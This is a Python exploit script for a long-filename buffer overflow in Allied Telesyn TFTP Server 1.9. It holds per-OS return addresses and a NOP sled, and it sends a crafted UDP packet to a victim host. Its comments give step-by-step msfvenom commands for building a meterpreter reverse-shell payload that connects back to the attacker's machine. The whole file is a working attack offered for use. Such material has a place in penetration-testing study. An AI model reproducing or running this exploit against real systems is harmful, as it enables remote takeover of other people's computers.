#!/usr/bin/python
# Standalone exploit for Allied Telesyn TFTP Server 1.9
# Written by daleksec 07/21/2016
# Special thanks to NetSec.ws for the excellent walk through (see http://netsec.ws/?p=262)

import sys, socket
 
if len(sys.argv)<=2:
 sys.exit('''Usage: python attftp_long_filename.py <IP Address> <Port> <Your IP Address> <OS choice>

 0	Windows NT SP4 English
 1	Windows 2000 SP0 English
 2	Windows 2000 SP1 English
 3	Windows 2000 SP2 English
 4	Windows 2000 SP3 English
 5	Windows 2000 SP4 English
 6	Windows XP SP0/1 English
 7	Windows XP SP2 English
 8	Windows XP SP3 English
 9	Windows Server 2003
 10	Windows Server 2003 SP2
 ''')
 
host	= sys.argv[1]		# Victim's IP
port	= int(sys.argv[2])	# Victim's Port
lhost	= sys.argv[3]		# Attacker's IP
os	= int(sys.argv[4])	# OS Choice
ret	= []			# Define array containing return addresses

# Define return addresses (Source: Metasploit)
ret = ["\xf7\xa6\x2e\x70",
	"\xc3\x62\x03\x75",
	"\x85\x1d\x03\x75",
	"\x1b\x43\x03\x75",
	"\x5a\x1c\xfe\x74",
	"\xce\x1d\x03\x75",
	"\xfb\x7b\xab\x71",
	"\x72\x93\xab\x71",
	"\x53\x93\x42\x7e",
	"\xd3\xfe\x86\x7c",
	"\x1b\xa0\x86\x7c"]

nop	= "\x90" * (25-len(lhost))	# Create a NOP string as to bring NOPs + LHOST up to 25 bytes

# The payload must be customized to include your own IP address and listening port, so you'll need to generate it manually.
# To do so, use the following steps:
# 1.) Enter the following to create a hex file of the amount that needs to be subtracted from the stack pointer (3500):
# perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
# 2.) Next, use the following command to create a staged meterpreter shell payload:
# msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload
# 3.) Then, combine the two files you just created.
# cat stackadj payload > shellcode
# 4.) Finally, let's eliminate the bad characters.
# msfvenom -p generic/custom PAYLOADFILE=./shellcode -b "\x00" -e x86/shikata_ga_nai -f python
# Enter the output as the value of the "payload" variable. You may need to run this exploit a few times for it to work.

payload	= "" # Payload (bad characters = \x00, stack adjustment = -3500, can't exceed 210 bytes of space)
# payload += ""
# payload += ""
# ...

exploit	= "\x00\x02" + nop + payload + ret[os] + "\x83\xc4\x28\xc3\x00netascii\x00" 	# Our exploit so far 

client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)	# Declare a UDP socket
client.sendto(exploit, (host, port))				# Send the exploit over UDP to the nominated addresses